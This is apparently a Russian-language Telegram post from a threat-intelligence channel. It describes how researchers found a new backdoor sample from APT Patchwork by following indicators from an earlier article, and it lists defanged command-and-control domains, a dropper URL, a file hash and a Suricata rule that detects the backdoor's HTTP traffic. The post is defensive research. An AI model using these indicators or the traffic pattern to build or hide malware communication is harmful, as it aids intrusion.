В статье приводился пример вредоносного семпла с кратким описанием сетевой активности и прилагающимися скриншотами кода из IDE. По содержимому сетевых запросов (хеш-суммы семплов, как назло, не были указаны) мы нашли примеры трафика C2-сервера yw56[.]info (первый скриншот). Бэкдор отправляет данные о системе на C2-сервер, кодируя их с помощью XOR и Base64. Однако интересно было просмотреть и приведенные в упомянутом исследовании ссылки... так мы и наткнулись на новый семпл!
Но обо всем по порядку
Исследование индикаторов компрометации из статьи в открытых источниках позволило нам обнаружить, что по URL
weibo[.]nihaoucloud[.]org/akowutbuu753dtRWq21jk/odiworukdjo2375kjkl1lk87hl0
какое-то время назад дропался семпл
6afdf4a3088bff045e1998d2dc2863b90d06765abb2dc35c7b93c456b9818e55
детекты которого светились как новогодняя елка на всем нам известном ресурсе
«Что если это тот самый неуказанный в статье хешик?» — подумали мы и засунули его в доступные песочницы: VirusTotal CAPE Sandbox и Triage. И, о чудо, его трафик отличался от представленного в статье! Причем упоминаний этих сетевых взаимодействий не было нигде, как и срабатываний сетевых сигнатур, а взаимодействие бэкдор вел с C2-сервером shrilongu[.]info с датой создания 19.04.2024, о котором также ранее не сообщалось (подробнее на втором скриншоте).
🥳 Бинго! Один URL позволил нам атрибутировать семпл и отнести его к APT-группировке Patchwork (выдала схожесть HTTP payload) и, конечно, написать детектирующее правило:
alert http any any -> any any (msg: "BACKDOOR [PTsecurity] Unknown Backdoor (APT Patchwork)"; flow: established, to_server; pcre: "/^[a-z]{10,40}$/V"; http.method; content: "POST"; http.header; content: "Content-Type: application/x-www-form-urlencoded"; content: "Cache-Control: no-cache"; http.request_body; content: "umnome="; depth: 7; fast_pattern; content: "&pmjodf="; distance: 0; content: "&idkdfjej="; distance: 0; content: "&cokenme="; distance: 0; classtype: trojan-activity; sid: 1;)
Этот пример показывает, что на самом деле даже после прочтения чужих ресерчей, можно провести свой — и довольно успешно. А реверс файлов нужен далеко не всегда, по крайней мере не при поверхностном быстром анализе — в этом случае исследователь может использовать доступные песочницы с публичной экспертизой.
#detect #malware #network #suricata #patchwork #tips
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍5👏4